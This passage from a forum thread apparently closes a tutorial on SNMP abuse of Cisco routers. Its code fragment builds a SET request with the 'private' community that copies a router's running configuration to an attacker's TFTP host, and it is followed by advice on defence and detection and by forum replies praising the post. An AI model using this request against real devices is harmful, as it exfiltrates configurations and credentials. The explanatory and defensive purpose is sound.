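    # Constructed: attacker's TFTP listener at 192.168.0.5, RW community "private".
    msg = build_set_request("private",
                            config_copy_varbinds(333, "192.168.0.5", "rtr1-running.cfg"))
    print(len(msg), "bytes:", msg.hex())
```

Two practical points follow from the bytes. First, the whole operation is one SET authorised by nothing but a writable community string, so the defence is the one the post's requirements imply: no RW community at all, or an SNMP access list plus SNMPv3 with authPriv. Second, the triage function at the end is deliberately cheap; a real detector would parse the PDU, but alerting on any SetRequest that touches the ccCopyEntry subtree is already a high-signal rule.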

computathug
Administrator
Posts: 2693
Joined: 29 Mar 2007, 16:00
Location: UK

Post by computathug »

Brilliantly written piece of work there buddy.

I will read more when I have time, which will be after the new year.

Nice one
:wink:


Post by Still_Learning »

The original author is by abru. I did not write it, but it is an awesome tutorial, should be stickied :wink:
Gone

DNR
Digital Mercenary
Posts: 6114
Joined: 24 Feb 2006, 17:00
Location: Michigan USA

Post by DNR »

Good job mate.

**DNR uses some sticky budz to stick-y the thread
-
He gives wisdom to the wise and knowledge to the discerning. He reveals deep and hidden things; he knows what lies in Darkness, and Light dwells with him.

ph0bYx
Staff Member
Posts: 2039
Joined: 22 Sep 2008, 16:00

Post by ph0bYx »

exactly what I'm looking for :D
HnY!


Post by Still_Learning »

DNR wrote:Good job mate.

**DNR uses some sticky budz to stick-y the thread
Thanks my first tutorial sticky! woo hoo
Last edited by Still_Learning on 03 Jan 2009, 13:33, edited 1 time in total.
Gone

Nooh
Newbie
Posts: 6
Joined: 20 Dec 2008, 17:00
Location: Pakistan

Post by Nooh »

Now that is what I call C 8O 8O L
Very Nice S.L.

But one thing, where can I find this version Arbu is talking about, i.e. 4.9.8?
I've got 4.9.25 from their site.
And in your downloads section it's a very old one.
Regards, Nuh
Everyone wants to go to Heaven, but nobody wants to die... fact, isn't it?

I'm not laughing WITH you, I'm laughing AT you

Protect your REPT.
